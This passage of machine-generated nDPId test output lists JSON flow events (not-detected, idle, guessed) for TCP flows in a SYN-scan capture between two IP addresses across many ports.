+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275058031,"flow_last_seen":1278275058093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275058031,"flow_last_seen":1278275058093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","ndpi": 